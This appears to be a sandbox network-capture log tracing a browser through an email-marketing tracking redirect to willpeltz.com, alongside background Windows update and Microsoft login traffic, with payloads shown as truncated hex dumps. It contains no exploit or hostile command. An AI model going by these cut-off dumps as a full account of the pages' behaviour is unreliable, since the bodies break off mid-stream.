                                                X-Xss-Protection: 1
                                                Connection: close
                                                2024-08-20 13:40:51 UTC581INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 6e 6f 73 63 72 69 70 74 3e 0a 09 09 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 2e 30 3b 68 74 74 70 73 3a 2f 2f 77 69 6c 6c 70 65 6c 74 7a 2e 63 6f 6d 2f 22 3e 0a 09 09 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 69 62 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 63 6d 2e 68 74 6d 6c 3f 69 64 3d 38 30 33 31 31 39 37 23 74 72 61 6e 73 3d 30 26 61 6d 70 3b 75 73
                                                Data Ascii: <!DOCTYPE html><html><head><title>Redirection</title></head><body><noscript> <meta http-equiv="refresh" content="0.0;https://willpeltz.com/"></noscript> <iframe src="https://sibautomation.com/cm.html?id=8031197#trans=0&amp;us


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.1649714104.18.25.2434435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:40:51 UTC707OUTGET /cm.html?id=8031197 HTTP/1.1
                                                Host: sibautomation.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: iframe
                                                Referer: https://e9dj7.r.ag.d.sendibm3.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:40:52 UTC394INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:40:52 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                x-powered-by: Sails <sailsjs.com>
                                                vary: Accept-Encoding
                                                access-control-allow-origin: *
                                                CF-Cache-Status: HIT
                                                Age: 25404
                                                Expires: Tue, 20 Aug 2024 15:40:52 GMT
                                                Cache-Control: public, max-age=7200
                                                Server: cloudflare
                                                CF-RAY: 8b62cc317d681899-EWR
                                                2024-08-20 13:40:52 UTC975INData Raw: 39 37 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 75 75 69 64 56 34 28 29 20 7b 20 76 61 72 20 64 20 3d 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 3b 20 72 65 74 75 72 6e 20 27 78 78 78 78 78 78 78 78 2d 78 78 78 78 2d 34 78 78 78 2d 79 78 78 78 2d 78 78 78 78 78 78 78 78 78 78 78 78 27 2e 72 65 70 6c 61 63 65 28 2f 5b 78 79 5d 2f 67 2c 20 66 75 6e 63 74 69 6f 6e 28 63 29 7b 20 76 61 72 20 72 20 3d 20 28 64 20 2b 20 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 20 2a 20 31 36 29 20 25 20 31 36 20 7c 20 30 3b 20 64 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28
                                                Data Ascii: 97c<!DOCTYPE html><html><head><script type="text/javascript"> function uuidV4() { var d = new Date().getTime(); return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c){ var r = (d + Math.random() * 16) % 16 | 0; d = Math.floor(
                                                2024-08-20 13:40:52 UTC1369INData Raw: 20 69 66 20 28 63 2e 69 6e 64 65 78 4f 66 28 63 6e 29 20 3d 3d 20 30 29 20 72 65 74 75 72 6e 20 63 2e 73 75 62 73 74 72 69 6e 67 28 63 6e 2e 6c 65 6e 67 74 68 2c 20 63 2e 6c 65 6e 67 74 68 29 3b 7d 20 72 65 74 75 72 6e 20 27 27 3b 7d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 71 73 5f 65 6e 63 6f 64 65 28 6f 29 20 7b 20 76 61 72 20 73 74 72 20 3d 20 5b 5d 3b 20 66 6f 72 20 28 76 61 72 20 70 20 69 6e 20 6f 29 20 7b 20 6f 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 70 29 20 26 26 20 73 74 72 2e 70 75 73 68 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 70 29 20 2b 20 22 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 5b 70 5d 29 29 3b 7d 72 65 74 75 72 6e 20 73 74 72 2e 6a 6f 69 6e 28 22 26 22 29 3b 7d 0a 20 20 20
                                                Data Ascii: if (c.indexOf(cn) == 0) return c.substring(cn.length, c.length);} return '';} function qs_encode(o) { var str = []; for (var p in o) { o.hasOwnProperty(p) && str.push(encodeURIComponent(p) + "=" + encodeURIComponent(o[p]));}return str.join("&");}
                                                2024-08-20 13:40:52 UTC91INData Raw: 69 64 20 3d 20 71 73 2e 63 75 69 64 3b 7d 3b 20 69 66 20 28 63 6d 5f 66 6c 61 67 29 20 7b 72 71 5f 73 65 6e 64 28 63 6d 29 3b 7d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                Data Ascii: id = qs.cuid;}; if (cm_flag) {rq_send(cm);} </script></head><body></body></html>
                                                2024-08-20 13:40:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.1649715104.18.7.694435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:40:52 UTC633OUTGET /cm?uuid=109bd09f-8162-4c15-979d-9737cee25901&client_id=8031197&trans=0&user_id=1 HTTP/1.1
                                                Host: in-automate.brevo.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://sibautomation.com
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://sibautomation.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:40:52 UTC233INHTTP/1.1 204 No Content
                                                Date: Tue, 20 Aug 2024 13:40:52 GMT
                                                Connection: close
                                                access-control-allow-origin: *
                                                Cache-Control: no-cache
                                                via: 1.1 google
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8b62cc35bbcb8c1e-EWR


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.1649716162.241.114.354435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:40:52 UTC687OUTGET / HTTP/1.1
                                                Host: willpeltz.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                Referer: https://e9dj7.r.ag.d.sendibm3.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:40:53 UTC159INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:40:52 GMT
                                                Server: Apache
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-08-20 13:40:53 UTC7247INData Raw: 31 63 34 37 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d
                                                Data Ascii: 1c47<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="Content-Security-
                                                2024-08-20 13:40:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.1649717162.241.114.354435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:40:53 UTC549OUTGET /favicon.ico HTTP/1.1
                                                Host: willpeltz.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:40:53 UTC164INHTTP/1.1 404 Not Found
                                                Date: Tue, 20 Aug 2024 13:40:53 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                2024-08-20 13:40:53 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.1649721184.28.90.27443
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:40:55 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept: */*
                                                Accept-Encoding: identity
                                                User-Agent: Microsoft BITS/7.8
                                                Host: fs.microsoft.com
                                                2024-08-20 13:40:55 UTC495INHTTP/1.1 200 OK
                                                ApiVersion: Distribute 1.1
                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                Content-Type: application/octet-stream
                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                Server: ECAcc (lpl/EF06)
                                                X-CID: 11
                                                X-Ms-ApiVersion: Distribute 1.2
                                                X-Ms-Region: prod-neu-z1
                                                Cache-Control: public, max-age=183704
                                                Date: Tue, 20 Aug 2024 13:40:55 GMT
                                                Connection: close
                                                X-CID: 2


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.1649722184.28.90.27443
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:40:56 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept: */*
                                                Accept-Encoding: identity
                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                Range: bytes=0-2147483646
                                                User-Agent: Microsoft BITS/7.8
                                                Host: fs.microsoft.com
                                                2024-08-20 13:40:56 UTC515INHTTP/1.1 200 OK
                                                ApiVersion: Distribute 1.1
                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                Content-Type: application/octet-stream
                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                Server: ECAcc (lpl/EF06)
                                                X-CID: 11
                                                X-Ms-ApiVersion: Distribute 1.2
                                                X-Ms-Region: prod-weu-z1
                                                Cache-Control: public, max-age=183685
                                                Date: Tue, 20 Aug 2024 13:40:56 GMT
                                                Content-Length: 55
                                                Connection: close
                                                X-CID: 2
                                                2024-08-20 13:40:56 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.164972440.68.123.157443
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:40:59 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sr5KOmdYZKCn+Vv&MD=WGz5RGkc HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept: */*
                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                Host: slscr.update.microsoft.com
                                                2024-08-20 13:40:59 UTC560INHTTP/1.1 200 OK
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                Content-Type: application/octet-stream
                                                Expires: -1
                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                MS-CorrelationId: 23c433da-0f42-4176-a803-874d73bd194a
                                                MS-RequestId: c0b992d5-b0e2-45d8-9b3d-87958e61d791
                                                MS-CV: 4iuONA3Frkq+NcNE.0
                                                X-Microsoft-SLSClientCache: 2880
                                                Content-Disposition: attachment; filename=environment.cab
                                                X-Content-Type-Options: nosniff
                                                Date: Tue, 20 Aug 2024 13:40:58 GMT
                                                Connection: close
                                                Content-Length: 24490
                                                2024-08-20 13:40:59 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                2024-08-20 13:40:59 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10192.168.2.164972520.190.159.2443
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:40:59 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                Connection: Keep-Alive
                                                Content-Type: application/soap+xml
                                                Accept: */*
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                Content-Length: 4710
                                                Host: login.live.com
                                                2024-08-20 13:40:59 UTC4710OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                2024-08-20 13:41:00 UTC569INHTTP/1.1 200 OK
                                                Cache-Control: no-store, no-cache
                                                Pragma: no-cache
                                                Content-Type: application/soap+xml; charset=utf-8
                                                Expires: Tue, 20 Aug 2024 13:39:59 GMT
                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                Referrer-Policy: strict-origin-when-cross-origin
                                                x-ms-route-info: C538_BAY
                                                x-ms-request-id: 99a1e4ba-3df2-41b8-bf6b-78cd1bce41b6
                                                PPServer: PPV: 30 H: PH1PEPF00011EDA V: 0
                                                X-Content-Type-Options: nosniff
                                                Strict-Transport-Security: max-age=31536000
                                                X-XSS-Protection: 1; mode=block
                                                Date: Tue, 20 Aug 2024 13:40:59 GMT
                                                Connection: close
                                                Content-Length: 10173
                                                2024-08-20 13:41:00 UTC10173INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192.168.2.164972720.190.159.2443
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:02 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                Connection: Keep-Alive
                                                Content-Type: application/soap+xml
                                                Accept: */*
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                Content-Length: 4710
                                                Host: login.live.com
                                                2024-08-20 13:41:02 UTC4710OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                2024-08-20 13:41:03 UTC569INHTTP/1.1 200 OK
                                                Cache-Control: no-store, no-cache
                                                Pragma: no-cache
                                                Content-Type: application/soap+xml; charset=utf-8
                                                Expires: Tue, 20 Aug 2024 13:40:02 GMT
                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                Referrer-Policy: strict-origin-when-cross-origin
                                                x-ms-route-info: C538_BAY
                                                x-ms-request-id: 4b1326fd-fbd4-439b-a9cf-5304a8843b51
                                                PPServer: PPV: 30 H: PH1PEPF00018BC9 V: 0
                                                X-Content-Type-Options: nosniff
                                                Strict-Transport-Security: max-age=31536000
                                                X-XSS-Protection: 1; mode=block
                                                Date: Tue, 20 Aug 2024 13:41:02 GMT
                                                Connection: close
                                                Content-Length: 10173
                                                2024-08-20 13:41:03 UTC10173INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
